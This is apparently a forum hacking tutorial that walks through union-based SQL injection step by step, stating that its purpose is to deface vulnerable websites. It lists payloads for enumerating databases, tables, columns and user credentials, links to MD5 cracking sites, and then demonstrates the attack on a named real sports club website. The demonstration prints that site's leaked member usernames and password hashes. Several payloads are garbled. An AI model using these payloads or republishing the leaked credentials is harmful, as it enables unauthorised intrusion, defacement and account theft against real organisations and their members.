Hi! Friends, I will light the way of sql injection, which will help you to deface a vulnerable web site. so here is the way:
1.
(Origin)
2.
(ada error/bug sql)
3.
Code:
index.php?id=7+and+1=1--
(True value) (equal sign + jgk with% 20 in url address bar of the distance or space)
4.
Code:
index.php?id=7+and+1=2--
(False, no display)
5.
Code:
index.php?id=7+order+by+5--
(Look how many column) (for example, there are 5 column)
6.
Code:
index.php?id=7+union+select+1,2,3,4,5--
(Look for the column that could inject) (no change)
7.
Code:
index.php?id=-7+union+select+1,2,3,4,5--
(Display number) (eg there are numbers 2 and 3 display the column that has a bug)
8.
Code:
index.php?id=-7+union+select+1,database(),3,4,5--
(See database) (replace the number 2 or 3)
9.
Code:
index.php? id =- 7 + union + select +1, concat (user (), 0x3a, database ()), version () ,4,5 -
(Alternate to see at once) (0x3a same jgk: but convert Dlm hexa)
10.
Code:
index.php?id=-7+union+select+1,2,table_name,4,5+from+information_schema.tables
+where+table_schema=database()+limit+0,1--
(dapatkan nama table 1per 1)
11.
Code:
index.php?id=-7+union+select+1,2,group_concat(table_name),4,5+from
+information_schema.tables+where+table_schema=database()--
(Tgk all the tables at once) (skip to easily reply No.10) (sample table that is table_user)
12.
Code:
index.php?id=-7+union+select+1,2,column_name,4,5+from+information_schema.columns
+where+table_name=0x7461626c655f75736572+limit+0,1--
(Get the name of the column) (convert to hex table_user name, tmbah prefix 0x)
13.
Code:
index.php?id=-7+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns
+where+table_name=0x7461626c655f75736572--
(Tgk all the column names in table_user) (eg to user_id and password_id)
14.
Code:
index.php? id =- 7 + union + select +1, database (), concat (user_id, password_id), from 4.5 + + table_user -
(Tgk username and pass) (need to get a pass crack md5)
15.
Code:
index.php?id=-7+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user--
(encrypted username and pass)
Now Decrypt it:
Code:
http://md5crack.com
http://www.md5this.com
http://passcracking.com
user : neo10101
pass : 1234567890
For Example:
1.
Code:
http://www.hillsshiresport.com.au/article.php?news_id=11
2.Code:
http://www.hillsshiresport.com.au/article.php?news_id=11'
3.Code:
http://www.hillsshiresport.com.au/article.php?news_id=-11+union+select+1,2,3,4,5--
4.Code:
http://www.hillsshiresport.com.au/article.php?news_id=-11+union+select+1, concat (user (), 0x3a, database ()), version () ,4,5 -
New Result:Quote:hire_hssi@localhost:hire_hssi ( 5.0.51a-community)
5.Code:
http://www.hillsshiresport.com.au/article.php?news_id=-11+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--
New Result:Quote:letter,members,news,poll,sport
6.Code:
http://www.hillsshiresport.com.au/article.php?news_id=-11+union+select+1,2,3,group_concat(column_name),5+from+information_schema.columns+where+table_name=0x6d656d62657273--
Result we get:Quote:member_id,sport_id,member_name,member_desc,member_who,member_when,member_where,member_how,member_phone,member_email,member_web,
member_level,member_username,member_password,member_status,member_comment
7.Code:
http://www.hillsshiresport.com.au/article.php?news_id=-11+union+select+1,2,3,group_concat(member_username,0x3a,member_password),5+from+members--
And Here we got:Quote:touch:d46e1fcf4c07ce4a69ee07e4134bcef1,CHRSL:b1a743a19c218628c6f64546cb283776,hba:d8d00d2c9debbe8dad3cfeb7fdb05a67,:d41d8cd98f00b204e9800998ecf8427e,
hurricanes06:325996284af2cf7702b52001d1071d95,
Winston Hills Sports Club Ltd.:212fd9e45aedfb6428d8b5f872e11f7a,
Winston Hills Little Athletics Centre:8dca007e1cec4046b0aaacc75c741e3f,
netball:fc10a8c6b71dc25294d28fb86b122f6b,:d41d8cd98f00b204e9800998ecf8427e,:d41d8cd98f00b204e9800998ecf8427e,
Baulko:fc10a8c6b71dc25294d28fb86b122f6b,dylcon:5dac1b5914537a1bcd5ac55b181e8512,axkueozls:01e7c7f782b7b0371ee326bc3baad7be,:d41d8cd98f00b204e9800998ecf8427e
user :neo1010
pass :1234567890Thanks....